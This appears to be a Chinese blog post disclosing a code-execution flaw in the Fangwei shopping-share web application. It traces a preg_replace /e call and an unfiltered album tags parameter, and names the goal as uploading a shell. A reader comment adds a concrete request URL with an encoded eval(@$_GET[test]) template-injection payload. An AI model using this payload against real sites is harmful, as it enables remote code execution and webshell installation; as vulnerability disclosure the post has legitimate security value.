方维购物分享最新版前台代码漏洞

/core/function/global.func.php

最后的preg_replace 使用了/e的命令执行符号。
$content可被控制。
即页面上如果出现 即被执行args里的命令
寻找一个变量能被没有过滤掉关键字符之类,并且能在页面上显示的就行。
找了半天,找了个album.php的模块下的一个tags .
缺陷文件
/core/module/album.module.php 的300多行:

Tags 变量只做了分割处理。分割字符串为空格即%20
前面的正则条件是需要匹配\s 即空白字符,其中包括\t \r \n 等
所以,提交tags标签时,提交如下类似的字符串即进入到模版缓存替换执行中

upload

write

shell

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 1 Responses to “方维购物分享最新版前台代码漏洞”
    • sunnycode

      我本地测试怎么不管用
      album.php?action=show&id=13&test=phpinfo(); <div class="element"> 时尚元素:<a href="/book.php?action=shopping&tag=%253C%2521--dynamic%252509eval%2528%2540%2524_GET%255Btest%255D%2529%253B--%253E"><!--dynamic%09eval(@$_GET[test]);--></a>

      私信